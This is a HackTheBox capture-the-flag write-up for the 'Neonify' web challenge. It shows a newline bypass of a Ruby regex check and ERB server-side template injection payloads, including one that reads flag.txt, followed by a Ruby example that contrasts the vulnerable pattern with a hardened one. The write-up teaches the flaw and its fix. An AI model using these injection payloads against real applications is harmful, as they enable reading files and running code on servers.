HackTheBox Writeup - Challenges - Neonify

🕒 2025/04/28

  • Category: Web
  • Difficulty: Easy
  • IP: 94.237.61.82:37667

1. Website

  • If your input contains only numbers, letters, and spaces (screenshot):
    • 123 abc
  • If it includes anything else (screenshot):
    • Malicious Input Detected

2. Source Code

  • app/views/index.erb (screenshot)
  • app/controllers/neon.rb (screenshot)
    • #14: checks whether the input contains only numbers, letters, and spaces
  • index.erb#16 & neon.rb#15: the user input is evaluated as ERB, stored in @neon, and rendered inside an <h1> tag.

3. Bypassing Regex Check

As demonstrated in the referenced article, we can bypass the regex check by inserting a newline (\n) into the input.

Let’s first send a test payload to verify that the injection works:

  • Payload: 123\n<%= 1+1 %>
    • Encoded: 123%0A%3C%25%3D%201%2B1%20%25%3E
  • Request (screenshot)
  • Response (screenshot)

It works. We proceed with the actual payload to read the flag:

  • flag.txt location (screenshot)
  • Payload: 123\n<%= File.read('flag.txt') %>
    • Encoded: 123%0A%3C%25%3D%20File.read%28%27flag.txt%27%29%20%25%3E
  • Request (screenshot)
  • Response with the flag (screenshot)
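To show why the newline bypass in section 3 gets past the check described in section 2, and what a fixed version looks like, here is an added Ruby example (not the challenge's own code). It assumes the original check is a `^...$`-anchored allow-list regex, the usual cause of this bypass in Ruby, where `^` and `$` match at line boundaries rather than string boundaries.

```ruby
require 'erb'

# Assumed shape of the challenge's allow-list check (not the actual neon.rb):
# in Ruby, ^ and $ match at line boundaries, so only the first line is
# validated and anything after a newline slips through.
VULNERABLE_RE = /^[a-zA-Z0-9\s]+$/

# Hardened check: \A and \z anchor to the whole string (note: \Z would still
# allow a trailing newline), and a literal space replaces \s so newlines
# and tabs are not admitted either.
HARDENED_RE = /\A[a-zA-Z0-9 ]+\z/

def vulnerable_check(input)
  VULNERABLE_RE.match?(input)
end

def hardened_check(input)
  HARDENED_RE.match?(input)
end

# The unsafe pattern from the writeup: user input becomes the ERB template,
# so any <%= ... %> inside it is executed as Ruby.
def render_as_template(input)
  ERB.new(input).result(binding)
end

# Safe rendering: the template is fixed, the input is passed in as data and
# HTML-escaped, so it is never interpreted as ERB or as markup.
SAFE_TEMPLATE = ERB.new('<h1><%= ERB::Util.html_escape(neon) %></h1>')

def render_escaped(neon)
  SAFE_TEMPLATE.result_with_hash(neon: neon)
end

# Hardened handler mirroring the page's behaviour: reject on the anchored
# check, otherwise render the input escaped inside the <h1>.
def neonify(input)
  return 'Malicious Input Detected' unless hardened_check(input)
  render_escaped(input)
end

if __FILE__ == $PROGRAM_NAME
  bypass = "123\n<%= 1+1 %>" # constructed sample: the writeup's test payload
  puts "vulnerable check accepts bypass: #{vulnerable_check(bypass)}"
  puts "hardened check accepts bypass:   #{hardened_check(bypass)}"
  puts "neonify('123 abc') => #{neonify('123 abc')}"
  puts "neonify(bypass)    => #{neonify(bypass)}"
end
```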